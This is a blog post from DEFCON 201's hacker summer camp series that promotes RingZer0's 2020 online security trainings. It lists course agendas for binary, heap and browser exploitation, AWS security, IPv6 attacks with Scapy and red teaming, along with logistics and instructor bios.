Welcome to the DEFCON 201 guide to Ultimate Hacker Summer Camp! This is part of a series where we are going to cover all the vairous hacker conventions and shenanigans in August. As more blog posts are uploaded, you will be able to jump through the guide via these links:
ULTIMATE HACKER SUMMER CAMP — Part One: HOPE 2020
ULTIMATE HACKER SUMMER CAMP — Part Two: RightsCon
ULTIMATE HACKER SUMMER CAMP — Part Three: Black Hat USA
ULTIMATE HACKER SUMMER CAMP — Part Four: RingZer0
ULTIMATE HACKER SUMMER CAMP — Part Five: DEFCON Safe Mode
ULTIMATE HACKER SUMMER CAMP — Part Six: USENIX
RINGZERO 2020 ONLINE TRAININGS
Date: Saturday, August 1st — Friday August 14th
Website: https://ringzer0.training/
Platform(s): UNKNOWN
Scheduel: https://ringzer0.training/index.html#instructors
Live Streams:
N/A
Chat: Discord (Invite N/A)
Accesability: Only registered attendees will be able to partake in the Training Labs and Discord.
Tickets: https://ringzer0.regfox.com/ringzer0-2020-registration
Code Of Conduct: N/A
A highly vetted infosec trainings with plenty of time for hands-on practice, answering students’ questions, and knowledge sharing. Take your skills to the next level with Ringzer0.
Learn. Connect. Enjoy.
As a result of COVID-19, Ringzer0 is now offering its training online to ensure the safety of our students, instructors, and staff. Train from the comfort of your own home with our top Ringzer0 instructors. Their practical and interactive classes will be conveniently offered as a hybrid live instructor-led and self-paced learning format to accommodate time zone differences.
Ringzer0 is something new to Hacker Summer Camp, a series of high end proffesional training for the hacker that has the coin to pay for it. Black Hat Prices, DEF CON skills, these workshops take over the course of multiple days on one single subject. For those with deep pockets who are at an intermediary disccipline levelwith a few certs/bounties under their belt and want to progress to uber advanced 1337, this is the hacking crucible for you!
The Ringzer0 2020 RiskRecon scholarship fund is now accepting applications! Our scholarship is designed to further opportunities for women in cybersecurity, support their professional development and educational goals, and help them thrive in the industry. If you are interested in applying for a scholarship, please submit your application to us no later than July 23, 2020. Recipients will be notified at least a week before the beginning of August.
Cancellation policy: 60+ days before the event 75% of fees refunded; 30–60 days before event 50% refunded, less than 30 days 0% refunded. Course changes are allowed up to 14 days before event start (some restrictions will apply). Attendee changes can be accommodated up to 14 days prior to the event.
DEFCON 201 RINGZER0 COURSE HILIGHTS
These are some of the multi-day course trainings that stood out to us. Space is limited and this is not the full list so RSVP ASAP and look at the full list of trainings on their website: https://ringzer0.training/index.html#instructors
Zero To Leet — 64-bit Linux Exploitation
4 Day u_long 32 CPE Hour Training: August 2020
AUG 1,2,4,6 [click for important details!]
Abstract
Zero to Leet brings you an intense 32 hour course featuring a practical hands-on approach to exploit development on 64-bit Linux systems. This class is perfectly suited for students who are new to exploit development and want to break into the field of offensive security.
Our beginner level class kicks off with an introduction to x64 Intel architecture and assembly language, static analysis of vulnerable userland x64 binaries using IDA Pro, and GDB debugging techniques for dynamic analysis. Next, we’ll exploit stack-based buffer overflows where we will write shellcode from the ground up to gain code execution. Then we’ll bypass exploit mitigation techniques like XN/DEP using Return Oriented Programming (ROP). Labs will be conducted in a virtual environment for analysis and exploitation. Students will leave with the necessary hands-on experience, knowledge, and confidence to discover and exploit 0-day vulnerabilities in modern software.
SUGGESTED COMBO: HEAPLAB — GLIBC HEAP EXPLOITATION
Key Learning Objectives
- Introduction to the x64 Intel architecture
- Exploring x64 Intel assembly language
- Understanding how functions work
- Static analysis using IDA Pro
- Debugging and dynamic analysis on 64-bit Linux systems
- Decompiling binaries using Snowman
- Understanding common vulnerability classes
- Exploiting buffer overflows on the stack and heap
- Writing shellcode from the ground up
- Introduction to exploit mitigation techniques like XN/DEP
- Introduction to Return Oriented Programming
- Bypassing exploit mitigation using ROP
- Writing exploits to bypass ASLR
Who Should Attend
- Students with little to no experience in how to find and exploit software vulnerabilities
- Students who want to become security researchers or work in the field of offensive security
- Students familiar with 32-bit binary exploitation who want to upgrade their skills to 64-bit platforms
- Bug Hunters who want to write exploits for all the crashes they find.
- Members of reverse engineering research teams who want to learn exploit development
Agenda
Module 1:
- Introduction to the x64 Intel architecture
- Exploring x64 Intel assembly language
- EXERCISES — Examples in x64 Intel Assembly Language
- Understanding how functions work
- Static analysis of vulnerable 64-bit binaries using IDA Pro
- Debugging and dynamic analysis on 64-bit Linux systems
- EXERCISES — Static and Dynamic Analysis labs
Module 2:
- Introduction to stack-based buffer overflows
- Exploiting Stack Overflows
- EXERCISES — Stack Overflow exploitation
- Introduction to heap-based buffer overflows
- Introduction to heap exploitation
- EXERCISES — Exploititing heap vulnerabilities
Module 3:
- Writing Shellcode from the ground up
- Introduction to Exploit Mitigation Techniques (XN/DEP)
- Introduction to Return Oriented Programming
- EXERCISES — Bypassing XN/DEP using ROP
- ROP Tools
- EXERCISES — Searching for ROP Gadgets
- ROP Chaining
- EXERCISES — Exploit featuring ROP Chains
Module 4:
- Introduction to Exploit Mitigation Techniques (ASLR)
- Bypassing ASLR
- EXERCISES — Exploit featuring ASLR Defeats
- EXERCISE — Exploit combining DEP + ASLR bypasses
Pre-requisites
- Have a working knowledge of C programming and Python 2.7
- Knowledge of computer architecture and x86 is preferred
- Familiarity with navigating Linux environments and command line knowledge
- If none of the above apply, then enough patience to go through the pre-class tutorials.
Pre-class Tutorials
The following tutorials have been specially prepared to get students up to speed on essential concepts before coming to class.
- C Programming https://www.learn-c.org
- Python https://www.codecademy.com/learn/learn-python
- x86 Refresher http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
Hardware Requirements
- A working laptop (no Netbooks, no Tablets, no iPads)
- Intel Core i3 (equivalent or superior) required
- 8GB RAM required, at a minimum
- Wireless network card
- 40 GB free Hard disk space
Software Requirements
- Linux / Windows / Mac OS X desktop operating systems
- IDA 7 Freeware. The free version is sufficient.
- Snowman Decompiler. Free download here.
- VMware Workstation or Fusion. The free 30-day trial is sufficient.
- Ubuntu 14.04 64-bit virtual machine. This can be downloaded here.
- Administrator / root access MANDATORY
Students will be provided with
Students will be provided with access to course slides, sample code, and lab exercises which attendees can take with them to continue learning and practicing after the training ends.
Hahna Latonick
For the past 14 years of her engineering career, Hahna Kane Latonick has worked throughout the defense industry specializing in cybersecurity as a computer security researcher for the Department of Defense and other defense contracting companies. She has been featured as a cybersecurity subject matter expert on Fox Business News, ABC, U.S. News and World Report, and other national media outlets. She has led three tech startups teaching computer security while also serving as CTO of two of them. She has trained and developed security researchers at one of the top five aerospace and defense industry companies. She has also taught at the Security BSides Orlando conference. In 2014, she became a DEFCON CTF finalist, placing in 6th and ranking in the top 1.5% of ethical hackers worldwide. She also holds a CISSP and CEH certification. Latonick attended Swarthmore College and Drexel University where she earned her B.S. and M.S. in Computer Engineering along
HeapLAB — GLIBC Heap Exploitation
4 Day u_long 32 CPE Hour Training: August 2020
AUG 8,9,11,13 [click for important details!]
Abstract
For nearly 20 years, exploiting memory allocators has been something of an art form. Become a part of that legacy with HeapLAB.
The GNU C Library (GLIBC) is a fundamental part of most Linux desktop and many embedded distributions; its memory allocator is used in everything from starting threads to dealing with I/O. Learn how to leverage this vast attack surface with more than 10 different heap exploitation techniques, from the original “Unsafe Unlink” to the beautiful overflow-to-shell “House of Orange” and eventually to the cutting-edge “House of Corrosion”. In this hands-on course, students will alternate between learning new techniques and developing their own exploits based on what they’ve learned.
SUGGESTED COMBO: INTRODUCTION TO 64-BIT EXPLOIT DEVELOPMENT
Key Learning Objectives
- Introduction to the GLIBC memory allocator: “malloc”
- The history of GLIBC heap exploitation
- Understanding and bypassing different heap exploit mitigations
- Hijacking the flow of execution with heap exploits
- Leaking information with heap corruption
- Learning the “Houses” of heap exploitation
- Scripting heap exploits with pwntools
- Debugging heap implementations with GDB
Who Should Attend
- CTF team members who want to take on Linux heap challenges
- Linux exploit developers who want to add another string to their bow
- Anyone interested in “weird machines”
Agenda
Session 1
- An introduction to GLIBC and its memory allocator
- GLIBC heap exploitation history
- Tools of the trade
- GDB and pwndbg
- The pwntools library
- The “House of Force” technique
- The malloc() function
- The “top” chunk
- Hijacking the flow of execution
- Malloc’s hooks
- “One-gadgets”
- The “Fastbin Dup” technique
- The free() function
- Malloc’s fastbins
- Arenas
- Defeating the fastbins double-free mitigation
- Dealing with the fastbins size field check
- CHALLENGE: “fastbin dup 2”
Session 2
- The “Unsafe Unlink” technique
- Malloc’s unsortedbin
- Chunk coalescing
- Defeating the “safe unlinking” checks
- The “House of Orange” technique
- File stream exploitation
- The “Unsortedbin Attack”
- Top chunk extension
- Sorting
- Info leaks via the heap
- Leaking heap addresses
- Leaking libc addresses
- CHALLENGE: one-byte
- Leverage a one-byte overflow against a modern pwnable
Session 3
- The “House of Spirit” technique
- Passing corrupted values to free()
- Designing fake chunks
- The “House of Lore” technique
- Poisoning the unsortedbin
- Poisoning the smallbins
- Poisoning the largebins
- The “House of Einherjar” technique
- The “House of Rabbit” technique
- The malloc_consolidate() function
- Moving fake chunks between bins
- Project Zero’s “Poison Null Byte” technique
- CHALLENGE: poison null byte
- Leverage a single null byte overflow against a modern pwnable
Session 4
- The “House of Corrosion” technique
- Reviving the “House of Prime”
- Defeating libio vtable integrity checks
- Leveraging partial malloc metadata overwrites
- Triggering file stream exploits via failed asserts
- The Tcache
- The “Tcache Dup” technique
- Defeating the tcache double-free mitigation
- CHALLENGE: “tcache troll”
- Leverage a double-free against a modern pwnable
- BONUS CHALLENGE: “optimize”
Pre-requisites
- Confidence using command line tools
- Some basic Python scripting skills
- Familiarity with a debugging environment e.g. GDB
Hardware Requirements
- Laptop — powerful enough to run VMs
- 8GB RAM minimum
- 35GB free HDD space minimum
- USB-A slot or dongle to copy VM
Software Requirements
- Windows / Linux / macOS
- One of the following virtualization suites:
- VMWare Player
- VMWare Workstation
- VMWare Fusion
- VirtualBox
Max Kamper
Max Kamper is a researcher and exploit developer. A former Royal Marines Commando, Max was a member of the Information Exploitation Group’s electronic warfare squadron. Having traded radio signals for process signals, he now specializes in exploit development against Linux platforms. Max is also the author of the ROP Emporium website, a resource for learning practical x86 return-oriented programming.
Advanced Browser Exploitation
4 Day u_long 32 CPE Hour Training: August 2020
AUG 1–7 [click for important details!]
Abstract
Web browsers are among the most utilized consumer facing software products on the planet. As the ubiquitous gateway to the internet, browsers introduce significant risk to the integrity of personal computing devices. In the race to protect users while advancing web technology, premiere browsers have become increasingly complex targets to compromise. Over the course of this training, students will receive a thorough introduction to vulnerability research as it pertains to modern web browsers. This includes identifying, evaluating, and weaponizing the latest vulnerability patterns via the exploitation of several recently patched vulnerabilities. Through this, students will experience the end to end process of developing memory corruption based exploits against these high value targets. This course will focus specifically on Google Chrome and Apple Safari.
Key Learning Objectives
- Identify contemporary vulnerability patterns in web browsers
- Become familiar with the architecture of modern web browsers
- Build an in-depth understanding of browser internals and JavaScript engines
- Develop an understanding of target-specific exploit techniques
- Weaponize real-world vulnerabilities
- Execute renderer-only attacks to hijack user sessions
- Obtain a high level overview of browser sandboxing
Who Should Attend
This training is designed for vulnerability researchers who want to learn about browser internals in the context of security as well as contemporary JavaScript exploitation techniques.
Agenda
Module 1: Browser Architecture (General, Chrome, Safari/Webkit)
- Breaking down modern browser architectures, major components
- Setting up a browser research environment, building, debugging
- Interfacing with different components of the browser (DOM, JS)
- Introduction to JavaScript engines
- A deep-dive into JavaScript engine internals
- Low-level JavaScript types and natives
Module 2: JavaScript Internals in Exploitation (General, V8, JSC)
- Garbage collection implementations
- Current vulnerability patterns found in JS engines
- Introduction to exploit building blocks (Primitives)
- Leveraging JavaScript vulnerability classes
- Layering exploit primitives
Module 3: JavaScript JIT Compilers (General, V8)
- Overview of JavaScript JIT compiler pipelines
- Exploring JIT debugging tools
- Optimizations and typing
- Type cache and speculation
- JIT vulnerability classes, contemporary exploits
Module 4: JavaScript Exploit Engineering (General, V8, JSC)
- Constructing arbitrary memory primitives
- Overwriting JIT structures and control flow hijacking
- Continuation of execution
- Bypassing browser-specific mitigations
- UXSS, SOP bypasses, and renderer-only attacks
- N-Day exploitation
Pre-requisites
Attendees should be familiar with modern exploitation subjects (memory corruption, bug classes, DEP, ASLR, ROP), a working knowledge of C++ and JavaScript, some exposure to AMD64 assembly or low level systems, and Linux command line proficiency. This training will require a laptop which is able to connect to the Internet and perform SSH and VNC to a remote server.
Amy Burnett, RET2 Systems
Amy is a senior security researcher and co-founder of RET2 Systems, where she specializes in research of browser security and mitigation bypass. She has spoken about and previously lead trainings on advanced browser exploitation at private events and several conferences. She and her team developed and publicly demonstrated a remote code exploit against Safari on MacOS for Pwn2Own 2018, which also leveraged a macOS bug to gain root level
AWS Security Training
2 Day u_short 16 CPE Hour Training: August 2020
AUG 3,4 [click for important details!]
Abstract
2 days of advanced, fast paced Amazon Web Services (AWS) training. You’ll learn how to assess AWS accounts, how to secure them, and best practices for ensuring they stay secure. You’ll learn how to detect attackers and how to respond to incidents on AWS.
Key Learning Objectives
- Be able to identify security misconfigurations and risks in AWS accounts
- Understand how AWS auditing tools work and their limitations
- Be able to review IAM policies and resource policies
- Know the different log sources on AWS and their limitations
- Learn techniques for analyzing logs using jq and Athena
- Understand what GuardDuty looks for and what additional detections you can create
- Know the publicly available attack tools, techniques, and public security incidents of companies that have been breached while running on AWS
- Learn best practices for running securely on AWS
Who Should Attend
This is useful for security teams securing their own AWS environments, incident responders, pentesters, developers, and more. This training is fast paced and densely packed.
Testimonials
“Just finished a truly excellent AWS security training by @0xdabbad00. Well delivered, lean and super useful.” -Claudio Criscione
“Cloud security is complex, and confusing the first time you look at it. Scott’s AWS training was clearly structured, well-delivered, and helped me ramp up way more quickly than I could have on my own.” -Thomas Dullien (halvarflake)
“If you’re looking for serious AWS Security training @0xdabbad00 from @SummitRoute is your guy. Highly recommend considering this if your security teams are still scratching their heads on how to tame clouds, or believe they figured it all out.” -Karim El-Melhaoui
Agenda
Day 1:
- Overview of AWS: Shared responsibility model, unofficial rules AWS has held true with customers
- Disaster recovery; outages; SLAs
- S3 bucket policies and ACLs
- Other resources with policies and that can become public
- Logs: CloudTrail, CloudWatch Events, VPC Flow Logs
- GuardDuty
- Using jq and Athena
- Incident response
Day 2:
- Access keys and metadata service
- How IAM works: Understanding policies, ABAC, mistakes AWS has made, IAM boundaries, SCPs
- How common open-source security tools work: CloudMapper, CloudTracker, RepoKid, Security Monkey, Cloud Custodian, and more
- How to audit AWS accounts
- Known attack tools and techniques
- Known incidents of companies running on AWS
- Best practices when running on AWS
Pre-requisites
You should have some minimal experience using AWS, such as knowing what an EC2 instance or S3 bucket are. Only a laptop is needed. Labs will use the browser and EC2 Instance Connect (web-based SSH terminal).
Scott Piper, SummitRoute
Scott is an independent consultant helping companies secure their AWS environments, through private 2-day trainings, assessments, custom software development, and more. He holds all 5 associate and professional AWS certifications, plus the AWS Security Specialist certificate.
Scott has over a decade of experience doing infosec work, from developing tools to help people secure their networks, to securing those networks himself. He has worked at the NSA and as the Director of Security for a cybersecurity startup.
Scott Piper developed flAWS.cloud, flAWS2.cloud, CloudMapper, CloudTrac
IPv6 Network Security With Scapy
2 Day u_short 16 CPE Hour Training: August 2020
AUG 1–4 [click for important details!]
Abstract
Depending on who you ask and how you look at it, IPv6 can be considered either a minor or a major evolution from IPv4, especially on the security front. What is clear is the IPv6 introduction and deployment, and the mix of IPv4 and IPv6 creates security vulnerabilities and windows of opportunities for attackers.
Course Description
Continuously updated since 2009, this training mixes theory and practice in order to achieve an immediate application of the material. The different topics developed during the training are the result of discussions with students from companies, governmental entities and universities. They reflect typical IPv6 practical issues.
Starting from the basics, we will learn IPv6 security together, and practical attacks with Scapy; a powerful packet manipulation library that Guillaume developed IPv6 support, and is one of the official maintainers.
This training aims at providing a full understanding of IPv6 attacks and defense mechanisms. No previous IPv6 knowledge is required, as the instructor will go through the protocol in detail.
Many practical lab sessions allow you to manipulate all the concepts presented during the training. You will learn to master Scapy and build your own IPv6 attacks against real targets.
All labs are performed on virtual architectures. Everyone can experiment at their own pace, and test attacks without impacting the other participants. These architectures are ideally suited to remote teaching. The console used by students is also accessible by the instructor who can comment and take over the keyboard to provide instant advice.
At the end of the training, you will fully understand IPv6, and realize that it is not “just as small change in the network”, as it impacts a lot of systems and applications.
Course Topics
- Introduction to IPv6 and Scapy
- Overview of IPv6 tools
- IPv4 issues
- IPv6 differences
- IPv6 addresses
- The IPv6 protocol
- The ICMPv6 protocol
- The Neighbor Discovery Protocol
- DNS and IPv6
- The MLD Protocol
- IPv6 Network Enumeration
- Link local attacks
- Triggering an IPv6 CVE with Scapy
- Fuzzing IPv6 Implementations with AFL
- Protecting IPv6 networks
- Transition mechanisms
- Hardening Recommendations
Prerequisites
The lab exercises are based on a virtual machine hosted in the cloud. You have to bring your own laptop, preferably running Linux (native or virtualized), and have a working SSH client ready. Make sure the operating system is working properly especially the network component if you run it inside a VM.
You don’t have to pre-install any tools.
You should understand basic TCP/IP routing and basic Linux network commands. No prior knowledge of IPv6 nor Scapy is required.
Guillaume Valadon
Guillaume Valadon is the head of security at Netatmo and holds a PhD in IPv6 networking. He likes looking at data and crafting packets. In his spare time, he co-maintains Scapy and learns reversing embedded devices. Also, he still remembers what AT+MS=V34 means!
Guillaume regularly gives technical presentations, classes and live demonstrations, and writes research papers for conferences and magazines.
Sensepost: Introduction To Red Teaming
2 Day u_short 16 CPE Hour Training: August 2020
AUG 4,5,6 [click for important details!]
Abstract
If you want to transition your penetration testing into red teaming to better emulate real criminal hacking campaigns, and ultimately show real impact, then this course is for you.
It is sometimes said that penetration testers emulate other penetration testers rather than real bad guys, leaving organisations exposed to what they miss.
This course aims to change that. By leveraging our experience in red teaming and business-critical compromises, we’ve put together a course to teach you how to test your organisation like a real criminal would.
No equipment other than a laptop is needed, however, our lab environment serves as the perfect place to level-up your traditional pentesting experience.
SUGGESTED COMBO: Q DIVISION — HARDWARE TOOLS FOR CLOSE QUARTER HACKING
This course is the result of our 19 years of experience giving training and will advance your ability to understand and compromise organisational networks. We’ve taken our red teaming approaches and combined them with real-life attacks to give you a wild two days of hardcore hands on hacking.
This is a very hands on course, and some of the topics and practical exercises include:
- Exploitation and gaining a foothold via phishing
- Malware delivery vectors using real samples, loaders and developing AV bypasses
- Privilege escalation and low noise persistence
- Advanced usage of tools like Empire, Metasploit and Covenant
- Dealing with different architectures and debugging “broken” tooling
- Lateral movement and living off the land
- Using the access you have to your advantage and challenging the myth of always needing administrator privileges
- Understanding tools vs detection trade offs
- Unusual C2s and hiding in plain sight (DNS, DNS over HTTPS, and Exchange based C2s)
- Emulating real threats by targeting financial systems.
Who should take this course
Penetration testers, network administrators, red/blue teams, security professionals, and IT security enthusiasts who have a need to acquaint themselves with real-world offensive tactics, techniques and tools.
Student will be provided with
- Access to our web class portal containing slides, practicals, walkthroughs and tools and prerequisites.
- Access to your own individual lab with numerous targets and capabilities, used for the practicals.
System Requirements
Students should bring a laptop that is capable of running an OpenVPN client, an SSH client and a Remote Desktop client.
Leon Jacobs, SensePost
Leon has been hacking for over a decade. He’s plied his trade at SensePost for the last three years having previously worked for a bank and ISP in South Africa. Leon spends most of his daytime hours hacking large networks or web and mobile applications. Leon spends most of his nighttime hours building hacking tools and techniques to contribute back to the community. He goes by @leonjza.
